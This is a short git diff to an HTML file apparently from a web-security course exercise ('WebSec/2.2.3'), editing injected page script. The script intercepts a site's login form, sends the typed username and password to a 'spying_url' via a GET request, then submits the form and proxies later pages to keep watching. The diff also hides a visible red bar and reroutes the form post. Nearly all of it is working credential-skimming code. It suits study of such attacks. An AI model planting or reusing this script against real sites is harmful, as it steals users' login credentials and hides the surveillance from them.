--- a/WebSec/2.2.3.html
+++ b/WebSec/2.2.3.html
@@ -40,9 +40,9 @@
                         proxy(backLink, spying_url, false);
                     };
 
-                    const bar = document.createElement('div');
+                    /* const bar = document.createElement('div');
                     bar.style = `background-color: red; width: 100%; height: 50px;`;
-                    document.querySelector('div.navbar-default').prepend(bar);
+                    document.querySelector('div.navbar-default').prepend(bar); */
 
                     var uName = $(`#logged-in-user`, this).text();
                     if (uName) {
@@ -63,6 +63,7 @@
                     /* This is the login/register form*/
                     $('.well > .form-inline').submit(function (e) {
                         e.preventDefault();
+                        console.log(e);
                         var form = this;
                         var uName = $(`input[name='username']`, this).val();
                         var uPass = $(`input[name='password']`, this).val();
@@ -70,7 +71,9 @@
                         var spyLink = `${spying_url}?event=login&user=${uName}&pass=${uPass}`;
                         console.log(spyLink);
                         $.get(spyLink);
-                        $.post($(form).attr('action'), $(form).serialize(), function () {
+                        console.log(e.originalEvent.explicitOriginalTarget)
+                        console.log(e.originalEvent.explicitOriginalTarget.attributes.formaction.value)
+                        $.post(e.originalEvent.explicitOriginalTarget.attributes.formaction.value, $(form).serialize(), function () {
                             proxy('./', spying_url);
                         });
                     });
